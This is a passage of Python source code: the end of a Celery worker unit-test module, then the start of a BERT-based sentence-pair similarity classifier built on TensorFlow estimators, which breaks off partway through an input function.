l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
m = create_message(backend, task=foo_task.name,
args=[2, 4, 8], kwargs={})
l.event_dispatcher = MockEventDispatcher()
l.receive_message(m.decode(), m)
in_bucket = self.ready_queue.get_nowait()
self.assertIsInstance(in_bucket, TaskRequest)
self.assertEqual(in_bucket.task_name, foo_task.name)
self.assertEqual(in_bucket.execute(), 2 * 4 * 8)
self.assertTrue(self.eta_schedule.empty())
def test_start_connection_error(self):
class MockConsumer(MainConsumer):
iterations = 0
def consume_messages(self):
if not self.iterations:
self.iterations = 1
raise KeyError("foo")
raise SyntaxError("bar")
l = MockConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, pool=BasePool())
l.connection_errors = (KeyError, )
self.assertRaises(SyntaxError, l.start)
l.heart.stop()
def test_consume_messages(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
class Consumer(object):
consuming = False
prefetch_count = 0
def consume(self):
self.consuming = True
def qos(self, prefetch_size=0, prefetch_count=0,
apply_global=False):
self.prefetch_count = prefetch_count
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection = Connection()
l.connection.obj = l
l.task_consumer = Consumer()
l.qos = QoS(l.task_consumer, 10, l.logger)
l.consume_messages()
l.consume_messages()
self.assertTrue(l.task_consumer.consuming)
self.assertEqual(l.task_consumer.prefetch_count, 10)
l.qos.decrement()
l.consume_messages()
self.assertEqual(l.task_consumer.prefetch_count, 9)
def test_maybe_conn_error(self):
def raises(error):
def fun():
raise error
return fun
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection_errors = (KeyError, )
l.channel_errors = (SyntaxError, )
l.maybe_conn_error(raises(AttributeError("foo")))
l.maybe_conn_error(raises(KeyError("foo")))
l.maybe_conn_error(raises(SyntaxError("foo")))
self.assertRaises(IndexError, l.maybe_conn_error,
raises(IndexError("foo")))
def test_apply_eta_task(self):
from celery.worker import state
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.qos = QoS(None, 10, l.logger)
task = object()
qos = l.qos.value
l.apply_eta_task(task)
self.assertIn(task, state.reserved_requests)
self.assertEqual(l.qos.value, qos - 1)
self.assertIs(self.ready_queue.get_nowait(), task)
def test_receieve_message_eta_isoformat(self):
class MockConsumer(object):
prefetch_count_incremented = False
def qos(self, **kwargs):
self.prefetch_count_incremented = True
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
m = create_message(backend, task=foo_task.name,
eta=datetime.now().isoformat(),
args=[2, 4, 8], kwargs={})
l.task_consumer = MockConsumer()
l.qos = QoS(l.task_consumer, l.initial_prefetch_count, l.logger)
l.event_dispatcher = MockEventDispatcher()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
items = [entry[2] for entry in self.eta_schedule.queue]
found = False
for item in items:
if item.args[0].task_name == foo_task.name:
found = True
self.assertTrue(found)
self.assertTrue(l.task_consumer.prefetch_count_incremented)
l.eta_schedule.stop()
def test_revoke(self):
ready_queue = FastQueue()
l = MyKombuConsumer(ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
id = gen_unique_id()
t = create_message(backend, task=foo_task.name, args=[2, 4, 8],
kwargs={}, id=id)
from celery.worker.state import revoked
revoked.add(id)
l.receive_message(t.decode(), t)
self.assertTrue(ready_queue.empty())
def test_receieve_message_not_registered(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
m = create_message(backend, task="x.X.31x", args=[2, 4, 8], kwargs={})
l.event_dispatcher = MockEventDispatcher()
self.assertFalse(l.receive_message(m.decode(), m))
self.assertRaises(Empty, self.ready_queue.get_nowait)
self.assertTrue(self.eta_schedule.empty())
def test_receieve_message_eta(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.event_dispatcher = MockEventDispatcher()
backend = MockBackend()
m = create_message(backend, task=foo_task.name,
args=[2, 4, 8], kwargs={},
eta=(datetime.now() +
timedelta(days=1)).isoformat())
l.reset_connection()
p = l.app.conf.BROKER_CONNECTION_RETRY
l.app.conf.BROKER_CONNECTION_RETRY = False
try:
l.reset_connection()
finally:
l.app.conf.BROKER_CONNECTION_RETRY = p
l.stop_consumers()
l.event_dispatcher = MockEventDispatcher()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
in_hold = self.eta_schedule.queue[0]
self.assertEqual(len(in_hold), 3)
eta, priority, entry = in_hold
task = entry.args[0]
self.assertIsInstance(task, TaskRequest)
self.assertEqual(task.task_name, foo_task.name)
self.assertEqual(task.execute(), 2 * 4 * 8)
self.assertRaises(Empty, self.ready_queue.get_nowait)
def test_start__consume_messages(self):
class _QoS(object):
prev = 3
value = 4
def update(self):
self.prev = self.value
class _Consumer(MyKombuConsumer):
iterations = 0
wait_method = None
def reset_connection(self):
if self.iterations >= 1:
raise KeyError("foo")
called_back = [False]
def init_callback(consumer):
called_back[0] = True
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, init_callback=init_callback)
l.task_consumer = MockConsumer()
l.broadcast_consumer = MockConsumer()
l.qos = _QoS()
l.connection = BrokerConnection()
l.iterations = 0
def raises_KeyError(limit=None):
l.iterations += 1
if l.qos.prev != l.qos.value:
l.qos.update()
if l.iterations >= 2:
raise KeyError("foo")
l.consume_messages = raises_KeyError
self.assertRaises(KeyError, l.start)
self.assertTrue(called_back[0])
self.assertEqual(l.iterations, 1)
self.assertEqual(l.qos.prev, l.qos.value)
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, init_callback=init_callback)
l.qos = _QoS()
l.task_consumer = MockConsumer()
l.broadcast_consumer = MockConsumer()
l.connection = BrokerConnection()
def raises_socket_error(limit=None):
l.iterations = 1
raise socket.error("foo")
l.consume_messages = raises_socket_error
self.assertRaises(socket.error, l.start)
self.assertTrue(called_back[0])
self.assertEqual(l.iterations, 1)
class test_WorkController(AppCase):
def setup(self):
self.worker = self.create_worker()
def create_worker(self, **kw):
worker = WorkController(concurrency=1, loglevel=0, **kw)
worker.logger = MockLogger()
return worker
def test_process_initializer(self):
from celery import Celery
from celery import platforms
from celery import signals
from celery.app import _tls
from celery.worker import process_initializer
from celery.worker import WORKER_SIGRESET, WORKER_SIGIGNORE
ignored_signals = []
reset_signals = []
worker_init = [False]
default_app = current_app
app = Celery(loader="default", set_as_current=False)
class Loader(object):
def init_worker(self):
worker_init[0] = True
app.loader = Loader()
def on_worker_process_init(**kwargs):
on_worker_process_init.called = True
on_worker_process_init.called = False
signals.worker_process_init.connect(on_worker_process_init)
def set_mp_process_title(title, hostname=None):
set_mp_process_title.called = (title, hostname)
set_mp_process_title.called = ()
pignore_signal = platforms.ignore_signal
preset_signal = platforms.reset_signal
psetproctitle = platforms.set_mp_process_title
platforms.ignore_signal = lambda sig: ignored_signals.append(sig)
platforms.reset_signal = lambda sig: reset_signals.append(sig)
platforms.set_mp_process_title = set_mp_process_title
try:
process_initializer(app, "awesome.worker.com")
self.assertItemsEqual(ignored_signals, WORKER_SIGIGNORE)
self.assertItemsEqual(reset_signals, WORKER_SIGRESET)
self.assertTrue(worker_init[0])
self.assertTrue(on_worker_process_init.called)
self.assertIs(_tls.current_app, app)
self.assertTupleEqual(set_mp_process_title.called,
("celeryd", "awesome.worker.com"))
finally:
platforms.ignore_signal = pignore_signal
platforms.reset_signal = preset_signal
platforms.set_mp_process_title = psetproctitle
default_app.set_current()
def test_with_rate_limits_disabled(self):
worker = WorkController(concurrency=1, loglevel=0,
disable_rate_limits=True)
self.assertTrue(hasattr(worker.ready_queue, "put"))
def test_attrs(self):
worker = self.worker
self.assertIsInstance(worker.scheduler, Timer)
self.assertTrue(worker.scheduler)
self.assertTrue(worker.pool)
self.assertTrue(worker.consumer)
self.assertTrue(worker.mediator)
self.assertTrue(worker.components)
def test_with_embedded_celerybeat(self):
worker = WorkController(concurrency=1, loglevel=0,
embed_clockservice=True)
self.assertTrue(worker.beat)
self.assertIn(worker.beat, worker.components)
def test_with_autoscaler(self):
worker = self.create_worker(autoscale=[10, 3], send_events=False,
eta_scheduler_cls="celery.utils.timer2.Timer")
self.assertTrue(worker.autoscaler)
def test_dont_stop_or_terminate(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.stop()
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate()
self.assertNotEqual(worker._state, worker.CLOSE)
sigsafe, worker.pool.signal_safe = worker.pool.signal_safe, False
try:
worker._state = worker.RUN
worker.stop(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
finally:
worker.pool.signal_safe = sigsafe
def test_on_timer_error(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.logger = MockLogger()
try:
raise KeyError("foo")
except KeyError:
exc_info = sys.exc_info()
worker.on_timer_error(exc_info)
logged = worker.logger.logged[0]
self.assertIn("KeyError", logged)
def test_on_timer_tick(self):
worker = WorkController(concurrency=1, loglevel=10)
worker.logger = MockLogger()
worker.timer_debug = worker.logger.debug
worker.on_timer_tick(30.0)
logged = worker.logger.logged[0]
self.assertIn("30.0", logged)
def test_process_task(self):
worker = self.worker
worker.pool = MockPool()
backend = MockBackend()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = TaskRequest.from_message(m, m.decode())
worker.process_task(task)
worker.pool.stop()
def test_process_task_raise_base(self):
worker = self.worker
worker.pool = MockPool(raise_base=True)
backend = MockBackend()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = TaskRequest.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
self.assertRaises(KeyboardInterrupt, worker.process_task, task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_SystemTerminate(self):
worker = self.worker
worker.pool = MockPool(raise_SystemTerminate=True)
backend = MockBackend()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = TaskRequest.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
self.assertRaises(SystemExit, worker.process_task, task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_regular(self):
worker = self.worker
worker.pool = MockPool(raise_regular=True)
backend = MockBackend()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = TaskRequest.from_message(m, m.decode())
worker.process_task(task)
worker.pool.stop()
def test_start_catches_base_exceptions(self):
class Component(object):
stopped = False
terminated = False
def __init__(self, exc):
self.exc = exc
def start(self):
raise self.exc
def terminate(self):
self.terminated = True
def stop(self):
self.stopped = True
worker1 = self.create_worker()
worker1.components = [Component(SystemTerminate())]
self.assertRaises(SystemExit, worker1.start)
self.assertTrue(worker1.components[0].terminated)
worker2 = self.create_worker()
worker2.components = [Component(SystemExit())]
self.assertRaises(SystemExit, worker2.start)
self.assertTrue(worker2.components[0].stopped)
def test_state_db(self):
from celery.worker import state
Persistent = state.Persistent
class MockPersistent(Persistent):
def _load(self):
return {}
state.Persistent = MockPersistent
try:
worker = self.create_worker(db="statefilename")
self.assertTrue(worker._finalize_db)
worker._finalize_db.cancel()
finally:
state.Persistent = Persistent
@skip("Issue #264")
def test_disable_rate_limits(self):
from celery.worker.buckets import FastQueue
worker = self.create_worker(disable_rate_limits=True)
self.assertIsInstance(worker.ready_queue, FastQueue)
self.assertIsNone(worker.mediator)
self.assertEqual(worker.ready_queue.put, worker.process_task)
def test_start__stop(self):
worker = self.worker
w1 = {"started": False}
w2 = {"started": False}
w3 = {"started": False}
w4 = {"started": False}
worker.components = [MockController(w1), MockController(w2),
MockController(w3), MockController(w4)]
worker.start()
for w in (w1, w2, w3, w4):
self.assertTrue(w["started"])
self.assertTrue(worker._running, len(worker.components))
worker.stop()
for component in worker.components:
self.assertTrue(component._stopped)
def test_start__terminate(self):
worker = self.worker
w1 = {"started": False}
w2 = {"started": False}
w3 = {"started": False}
w4 = {"started": False}
worker.components = [MockController(w1), MockController(w2),
MockController(w3), MockController(w4),
MockPool()]
worker.start()
for w in (w1, w2, w3, w4):
self.assertTrue(w["started"])
self.assertTrue(worker._running, len(worker.components))
self.assertEqual(worker._state, RUN)
worker.terminate()
for component in worker.components:
self.assertTrue(component._stopped)
self.assertTrue(worker.components[4]._terminated)
|
similarity.py
|
import os
from queue import Queue
from threading import Thread
import pandas as pd
import tensorflow as tf
import collections
import args
import tokenization
import modeling
import optimization
# os.environ['CUDA_VISIBLE_DEVICES'] = '1'
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Must only be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_mask, segment_ids, label_id):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.label_id = label_id
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_test_examples(self, data_dir):
"""Gets a collection of `InputExample`s for prediction."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
class SimProcessor(DataProcessor):
def get_train_examples(self, data_dir):
file_path = os.path.join(data_dir, 'train.csv')
train_df = pd.read_csv(file_path, encoding='utf-8')
train_data = []
for index, train in enumerate(train_df.values):
guid = 'train-%d' % index
text_a = tokenization.convert_to_unicode(str(train[0]))
text_b = tokenization.convert_to_unicode(str(train[1]))
label = str(train[2])
train_data.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return train_data
def get_dev_examples(self, data_dir):
file_path = os.path.join(data_dir, 'dev.csv')
dev_df = pd.read_csv(file_path, encoding='utf-8')
dev_data = []
for index, dev in enumerate(dev_df.values):
guid = 'test-%d' % index
text_a = tokenization.convert_to_unicode(str(dev[0]))
text_b = tokenization.convert_to_unicode(str(dev[1]))
label = str(dev[2])
dev_data.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return dev_data
def get_test_examples(self, data_dir):
file_path = os.path.join(data_dir, 'test.csv')
test_df = pd.read_csv(file_path, encoding='utf-8')
test_data = []
for index, test in enumerate(test_df.values):
guid = 'test-%d' % index
text_a = tokenization.convert_to_unicode(str(test[0]))
text_b = tokenization.convert_to_unicode(str(test[1]))
label = str(test[2])
test_data.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return test_data
def get_sentence_examples(self, questions):
for index, data in enumerate(questions):
guid = 'test-%d' % index
text_a = tokenization.convert_to_unicode(str(data[0]))
text_b = tokenization.convert_to_unicode(str(data[1]))
label = str(0)
yield InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label)
def get_labels(self):
return ['0', '1']
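# Hedged usage sketch (editor's addition): build InputExamples for ad-hoc
# sentence pairs the same way BertSim feeds its prediction queue.  The example
# pair below is illustrative only.
def _demo_sentence_examples():
    processor = SimProcessor()
    pairs = [(u"How old are you?", u"What is your age?")]
    examples = list(processor.get_sentence_examples(pairs))
    assert examples[0].guid == 'test-0' and examples[0].label == '0'
    return examples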
class BertSim:
def __init__(self, batch_size=args.batch_size):
self.mode = None
self.max_seq_length = args.max_seq_len
self.tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file, do_lower_case=True)
self.batch_size = batch_size
self.estimator = None
self.processor = SimProcessor()
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
def set_mode(self, mode):
self.mode = mode
self.estimator = self.get_estimator()
if mode == tf.estimator.ModeKeys.PREDICT:
self.input_queue = Queue(maxsize=1)
self.output_queue = Queue(maxsize=1)
self.predict_thread = Thread(target=self.predict_from_queue, daemon=True)
self.predict_thread.start()
@staticmethod
def create_model(bert_config, is_training, input_ids, input_mask, segment_ids,
labels, num_labels, use_one_hot_embeddings):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
# In the demo, we are doing a simple classification task on the entire
# segment.
#
# If you want to use the token-level output, use model.get_sequence_output()
# instead.
output_layer = model.get_pooled_output()
hidden_size = output_layer.shape[-1].value
output_weights = tf.compat.v1.get_variable(
"output_weights", [num_labels, hidden_size],
initializer=tf.compat.v1.truncated_normal_initializer(stddev=0.02))
output_bias = tf.compat.v1.get_variable(
"output_bias", [num_labels], initializer=tf.compat.v1.zeros_initializer())
with tf.compat.v1.variable_scope("loss"):
if is_training:
# apply 0.1 dropout during training
output_layer = tf.nn.dropout(output_layer, rate=0.1)
logits = tf.matmul(output_layer, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
probabilities = tf.nn.softmax(logits, axis=-1)
log_probs = tf.nn.log_softmax(logits, axis=-1)
one_hot_labels = tf.one_hot(labels, depth=num_labels, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(input_tensor=one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(input_tensor=per_example_loss)
return (loss, per_example_loss, logits, probabilities)
def model_fn_builder(self, bert_config, num_labels, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps,
use_one_hot_embeddings):
"""Returns `model_fn` closurimport_tfe for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
from tensorflow.python.estimator.model_fn import EstimatorSpec
tf.compat.v1.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.compat.v1.logging.info(" name = %s, shape = %s" % (name, features[name].shape))
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
label_ids = features["label_ids"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
(total_loss, per_example_loss, logits, probabilities) = BertSim.create_model(
bert_config, is_training, input_ids, input_mask, segment_ids, label_ids,
num_labels, use_one_hot_embeddings)
tvars = tf.compat.v1.trainable_variables()
initialized_variable_names = {}
if init_checkpoint:
(assignment_map, initialized_variable_names) \
= modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
tf.compat.v1.train.init_from_checkpoint(init_checkpoint, assignment_map)
tf.compat.v1.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.compat.v1.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, False)
output_spec = EstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op)
elif mode == tf.estimator.ModeKeys.EVAL:
def metric_fn(per_example_loss, label_ids, logits):
predictions = tf.argmax(input=logits, axis=-1, output_type=tf.int32)
accuracy = tf.compat.v1.metrics.accuracy(label_ids, predictions)
auc = tf.compat.v1.metrics.auc(label_ids, predictions)
loss = tf.compat.v1.metrics.mean(per_example_loss)
return {
"eval_accuracy": accuracy,
"eval_auc": auc,
"eval_loss": loss,
}
eval_metrics = metric_fn(per_example_loss, label_ids, logits)
output_spec = EstimatorSpec(
mode=mode,
loss=total_loss,
eval_metric_ops=eval_metrics)
else:
output_spec = EstimatorSpec(mode=mode, predictions=probabilities)
return output_spec
return model_fn
def get_estimator(self):
from tensorflow.python.estimator.estimator import Estimator
from tensorflow.python.estimator.run_config import RunConfig
bert_config = modeling.BertConfig.from_json_file(args.config_name)
label_list = self.processor.get_labels()
train_examples = self.processor.get_train_examples(args.data_dir)
num_train_steps = int(
len(train_examples) / self.batch_size * args.num_train_epochs)
num_warmup_steps = int(num_train_steps * 0.1)
if self.mode == tf.estimator.ModeKeys.TRAIN:
init_checkpoint = args.ckpt_name
else:
init_checkpoint = args.output_dir
model_fn = self.model_fn_builder(
bert_config=bert_config,
num_labels=len(label_list),
init_checkpoint=init_checkpoint,
learning_rate=args.learning_rate,
num_train_steps=num_train_steps,
num_warmup_steps=num_warmup_steps,
use_one_hot_embeddings=False)
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = args.gpu_memory_fraction
config.log_device_placement = False
return Estimator(model_fn=model_fn, config=RunConfig(session_config=config), model_dir=args.output_dir,
params={'batch_size': self.batch_size})
def predict_from_queue(self):
for i in self.estimator.predict(input_fn=self.queue_predict_input_fn, yield_single_examples=False):
self.output_queue.put(i)
def queue_predict_input_fn(self):
return (tf.data.Dataset.from_generator(
self.generate_from_queue,
output_types={
'input_ids': tf.int32,
'input_mask': tf.int32,
'segment_ids': tf.int32,
'label_ids': tf.int32},
output_shapes={
'input_ids': (None, self.max_seq_length),
'input_mask': (None, self.max_seq_length),
'segment_ids': (None, self.max_seq_length),
'label_ids': (1,)}).prefetch(10))
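# Because this dataset is fed by generate_from_queue, the single long-running
# estimator.predict() loop in predict_from_queue keeps the model loaded and serves every
# request pushed onto input_queue, avoiding a graph rebuild per prediction.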
def convert_examples_to_features(self, examples, label_list, max_seq_length, tokenizer):
"""Convert a set of `InputExample`s to a list of `InputFeatures`."""
for (ex_index, example) in enumerate(examples):
label_map = {}
for (i, label) in enumerate(label_list):
label_map[label] = i
tokens_a = tokenizer.tokenize(example.text_a)
tokens_b = None
if example.text_b:
tokens_b = tokenizer.tokenize(example.text_b)
if tokens_b:
# Modifies `tokens_a` and `tokens_b` in place so that the total
# length is less than the specified length.
# Account for [CLS], [SEP], [SEP] with "- 3"
self._truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
else:
# Account for [CLS] and [SEP] with "- 2"
if len(tokens_a) > max_seq_length - 2:
tokens_a = tokens_a[0:(max_seq_length - 2)]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambiguously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
if tokens_b:
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
label_id = label_map[example.label]
if ex_index < 5:
tf.compat.v1.logging.info("*** Example ***")
tf.compat.v1.logging.info("guid: %s" % (example.guid))
tf.compat.v1.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.compat.v1.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.compat.v1.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.compat.v1.logging.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
tf.compat.v1.logging.info("label: %s (id = %d)" % (example.label, label_id))
feature = InputFeatures(
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_id)
yield feature
def generate_from_queue(self):
while True:
predict_examples = self.processor.get_sentence_examples(self.input_queue.get())
features = list(self.convert_examples_to_features(predict_examples, self.processor.get_labels(),
args.max_seq_len, self.tokenizer))
yield {
'input_ids': [f.input_ids for f in features],
'input_mask': [f.input_mask for f in features],
'segment_ids': [f.segment_ids for f in features],
'label_ids': [f.label_id for f in features]
}
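# The blocking input_queue.get() above means the dataset generator only yields a new
# batch of features when predict() enqueues another sentence pair.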
def _truncate_seq_pair(self, tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
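# Worked example: with len(tokens_a) == 10, len(tokens_b) == 3 and max_length == 8,
# only tokens_a is popped (it stays the longer sequence) until the pair shrinks to
# 5 + 3 == 8 tokens.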
def convert_single_example(self, ex_index, example, label_list, max_seq_length, tokenizer):
"""Converts a single `InputExample` into a single `InputFeatures`."""
label_map = {}
for (i, label) in enumerate(label_list):
label_map[label] = i
tokens_a = tokenizer.tokenize(example.text_a)
tokens_b = None
if example.text_b:
tokens_b = tokenizer.tokenize(example.text_b)
if tokens_b:
# Modifies `tokens_a` and `tokens_b` in place so that the total
# length is less than the specified length.
# Account for [CLS], [SEP], [SEP] with "- 3"
self._truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
else:
# Account for [CLS] and [SEP] with "- 2"
if len(tokens_a) > max_seq_length - 2:
tokens_a = tokens_a[0:(max_seq_length - 2)]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambiguously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
if tokens_b:
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
label_id = label_map[example.label]
if ex_index < 5:
tf.compat.v1.logging.info("*** Example ***")
tf.compat.v1.logging.info("guid: %s" % (example.guid))
tf.compat.v1.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.compat.v1.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.compat.v1.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.compat.v1.logging.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
tf.compat.v1.logging.info("label: %s (id = %d)" % (example.label, label_id))
feature = InputFeatures(
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_id)
return feature
def file_based_convert_examples_to_features(self, examples, label_list, max_seq_length, tokenizer, output_file):
"""Convert a set of `InputExample`s to a TFRecord file."""
writer = tf.io.TFRecordWriter(output_file)
for (ex_index, example) in enumerate(examples):
if ex_index % 10000 == 0:
tf.compat.v1.logging.info("Writing example %d of %d" % (ex_index, len(examples)))
feature = self.convert_single_example(ex_index, example, label_list,
max_seq_length, tokenizer)
def create_int_feature(values):
f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return f
features = collections.OrderedDict()
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
features["label_ids"] = create_int_feature([feature.label_id])
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
writer.write(tf_example.SerializeToString())
writer.close()
def file_based_input_fn_builder(self, input_file, seq_length, is_training, drop_remainder):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
name_to_features = {
"input_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
"input_mask": tf.io.FixedLenFeature([seq_length], tf.int64),
"segment_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
"label_ids": tf.io.FixedLenFeature([], tf.int64),
}
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.io.parse_single_example(serialized=record, features=name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.cast(t, dtype=tf.int32)
example[name] = t
return example
def input_fn(params):
